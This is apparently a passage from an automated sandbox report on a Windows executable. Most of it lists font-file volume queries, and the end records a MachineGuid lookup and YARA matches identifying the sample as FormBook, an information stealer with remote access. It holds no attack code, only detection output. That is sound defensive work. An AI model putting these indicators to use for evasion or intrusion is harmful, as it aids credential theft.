          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
